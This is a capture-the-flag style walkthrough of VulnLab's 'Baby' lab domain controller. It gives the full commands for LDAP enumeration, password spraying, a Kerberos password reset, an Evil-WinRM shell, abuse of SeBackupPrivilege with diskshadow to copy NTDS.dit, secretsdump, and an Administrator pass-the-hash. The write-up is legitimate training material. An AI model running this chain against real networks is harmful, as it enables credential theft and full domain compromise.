Post

Baby Writeup (VulnLab)

An easy rated box on vulnlab, requiring LDAP enumeration and AD exploitation for root. Perfect for beginners exploring AD concepts.

Baby Writeup (VulnLab)

NMAP Port Scan

Starting off with an NMAP Scan:

1
nmap -sS -sV -A --min-rate 2500 10.10.106.67

nmapscan From the scan we are able to identify that this is a Domain Controller due to the services running such as LDAP & Kerberos. The scan also produces 2 DNS:

  • BabyDC.baby.vl
  • baby.vl

We can add this to our /etc/hosts file:

1
sudo nano /etc/hosts

/etc/hosts

Discovery of a password via LDAP

As LDAP was running on port 389, it is important to identify the naming context for further usage:

1
ldapsearch -H ldap://baby.vl -x -s base namingcontexts 

ldap1 Following the output, the part we are interested in is:

1
namingcontexts: DC=baby,DC=vl

We can use the naming context to craft further ldapsearch queries, such as searching for users:

1
ldapsearch -H ldap://baby.vl -x -b "DC=baby,DC=vl" '(objectClass=Person)' sAMAccountName description
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# Guest, Users, baby.vl
dn: CN=Guest,CN=Users,DC=baby,DC=vl
description: Built-in account for guest access to the computer/domain
sAMAccountName: Guest

# Jacqueline Barnett, dev, baby.vl
dn: CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl
sAMAccountName: Jacqueline.Barnett

# Ashley Webb, dev, baby.vl
dn: CN=Ashley Webb,OU=dev,DC=baby,DC=vl
sAMAccountName: Ashley.Webb

# Hugh George, dev, baby.vl
dn: CN=Hugh George,OU=dev,DC=baby,DC=vl
sAMAccountName: Hugh.George

# Leonard Dyer, dev, baby.vl
dn: CN=Leonard Dyer,OU=dev,DC=baby,DC=vl
sAMAccountName: Leonard.Dyer

# Connor Wilkinson, it, baby.vl
dn: CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
sAMAccountName: Connor.Wilkinson

# Joseph Hughes, it, baby.vl
dn: CN=Joseph Hughes,OU=it,DC=baby,DC=vl
sAMAccountName: Joseph.Hughes

# Kerry Wilson, it, baby.vl
dn: CN=Kerry Wilson,OU=it,DC=baby,DC=vl
sAMAccountName: Kerry.Wilson

# Teresa Bell, it, baby.vl
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
description: Set initial password to BabyStart123!
sAMAccountName: Teresa.Bell

# Caroline Robinson, it, baby.vl
dn: CN=Caroline Robinson,OU=it,DC=baby,DC=vl
sAMAccountName: Caroline.Robinson

After the ldapsearch query, all found users were appended into a users.txt wordlist. One user stands out with a description containing a password:

1
2
3
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
description: Set initial password to BabyStart123!
sAMAccountName: Teresa.Bell

Password spraying the domain controller

During LDAP Enumeration, Teresa.Bell was found to have a password in the user description, claiming that it is an initial password. To test if this password is correct and if other user’s still have the initial password set we can password spray the DC with crackmapexec:

1
crackmapexec smb BabyDC.baby.vl -u users.txt -p "BabyStart123\!" 

pwdSpray Caroline.Robinson appeared to still be using the password, however crackmapexec presented an error ‘STATUS_PASSWORD_MUST_CHANGE’

Resetting the password with kinit

After some research, I stumbled upon a blog post which you can find here, describing how AD accounts can have their passwords reset remotely using kerberos.

To start we have to edit the /etc/krb5.conf file:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
[libdefaults]
        default_realm = BABY.VL
        dns_lookup_kdc = false
        dns_lookup_realm = false
<SNIP>

[realms]
        BABY.VL = {
            kdc = 10.10.106.67
            admin_server = 10.10.106.67
        }
<SNIP>

[domain_realm]
        .baby.vl = BABY.VL

Then we can send our requests using kinit to reset the password:

1
kinit -V Caroline.Robinson@BABY.VL

pwdreset

We changed the password had been changed to ‘PwnBaby1234’, to check that this went through correctly another crackmapexec smb logon request is made:

1
crackmapexec smb BabyDc.baby.vl -u "Caroline.Robinson" -p "PwnBaby1234" 

user

Checking caroline’s groups & permissions

With access to a user account, we can utilise bloodhound to map out potential attack paths:

1
bloodhound-python -u "Caroline.Robinson" -p "PwnBaby1234" -ns 10.10.106.67 -d baby.vl

bl1

BloodHound-Python automatically gathered domain info, computer info, group info, user info and placed it all into JSON files. Now we have to upload the JSON to the bloodhound interface to get a visually pleasing view of the information: bl2

Following from the files being uploaded to the bloodhound web application, we are able to identify that Caroline is in the Backup Operators group: bl3

The bloodhound output showcased that caroline is part of the remote management users group, meaning that it will be possible to Evil-WinRM into the machine using the credentials:

1
evil-winrm -i BabyDC.baby.vl -u "Caroline.Robinson" -p "PwnBaby1234"

shell1

Now that we have a shell as caroline, we can check the privileges to potentially dump credentials:

1
whoami /priv

shell2

The privilege that stands out is:

1
SeBackupPrivilege             Back up files and directories  Enabled

Dumping domain credentials

Since we were able to identify that caroline is apart of the Backup Operators group & has SeBackupPrivilege enabled, the rest of the box should be relatively straight forward. We have to dump HKLM\System & NTDS.dit:

1
reg save hklm\system system.save

shell3

As we are not administrator yet, using vssadmin isn’t going to work. Researching ways to dump NTDS.dit lead to the discovery of this blog post. It describes how diskshadow can be used to copy the C:\ drive to eventually copy NTDS.dit.

First we have to create a text file:

1
2
3
4
5
6
set verbose on 
set metadata C:\temp\shadowdata.cab 
set context persistent 
add volume C: alias shadowdrive 
create 
expose %shadowdrive% z: 

Then upload the text file to our evil-winrm shell, make a new temp directory and execute diskshadow:

1
2
3
upload backup.txt
mkdir C:\temp
diskshadow /s backup.txt

shell4 shell5

We have to copy NTDS.dit from the newly created Z drive and then download both system.save and ntds.dit to our attacker machine:

1
2
3
robocopy /b z:\windows\ntds . ntds.dit
download system.save
download ntds.dit

shell6

Following from the download back to our attacker machine, we can utilise impacket-secretsdump to dump all domain credentials:

1
impacket-secretsdump -ntds ntds.dit -system system.save LOCAL

dumped

Getting a shell as Administrator

The domain admin’s NTLM has been dumped:

1
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee4457ae59f1e3fbd764e33d9cef123d:::

We can now use evil-winrm pth to login:

1
evil-winrm -i BabyDc.baby.vl -u Administrator -H "ee4457ae59f1e3fbd764e33d9cef123d"

pwned PWNED!

This post is licensed under CC BY 4.0 by the author.